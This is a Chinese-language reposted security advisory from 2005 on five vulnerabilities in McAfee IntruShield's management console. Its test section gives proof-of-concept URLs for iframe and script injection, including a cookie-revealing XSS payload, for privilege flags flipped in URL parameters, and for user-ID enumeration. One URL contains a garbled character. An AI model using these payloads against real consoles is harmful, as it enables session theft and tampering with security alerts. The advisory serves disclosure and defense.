McAfee IntruShield安全管理系统多个安全漏洞

发布日期：2005-07-07
更新日期：2005-07-07

受影响系统：

McAfee McAfee IntruShield安全管理系统

描述：

---

BUGTRAQ ID: 14167

McAfee IntruShield安全管理系统是用于管理IntruShield传感器设备部署的高级解决方案。

McAfee IntruShield安全管理系统中存在多个漏洞：

1) 攻击者可以在MISMS中嵌入HTML，这可能允许对有效管理员帐号执行钓鱼攻击。

2) 攻击者可以在MISMS中嵌入JavaScript并在浏览管理系统用户的安全环境中执行这些嵌入的脚本。

3) 攻击者可能访问MISMS中受限制的“Generate Reports”部分，这样非特权用户就可以获取有关服务所管理的配置和IP设备设置的重要信息。

4) 攻击者可以通过在发送给系统URL中将Access选项从“false”改为“true”来确认、解除确认或删除MISMS控制台的告警。

5) 默认下，所有用户ID值在URL中都是以明文传送的，这意味着攻击者可以暴力猜测帐号。

攻击者可以利用这些漏洞远程执行代码，获得提升权限，或获取敏感信息。但是，必须有效的用户帐号才能利用这些漏洞。

<*来源：c0ntexb （c0ntexb@gmail.com）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=112066594312876&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

1)

https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=/Demo:0&resourceName=/Demo:0/Manager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe src="http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504.htm" width=800 height=600 > </iframe>&severity=critical&count=1

2)

https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager& domainName=Demo&resourceName=<script>alert("There could be trouble ahead")</script><script>alert(document.cookie)</script>&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1


3)

https://intrushield:443/intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=/Demo& selectedDomain=0&fullAccessRight=true

4)

https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&domainName=/Demo:0&resourceName=辪o:0/Manager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1

5)

https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=4&logo=intruvert.gif

建议：

---

厂商补丁：

McAfee
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.mcafeesecurity.com/cn/products/mcafee/network_ips/management.htm

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!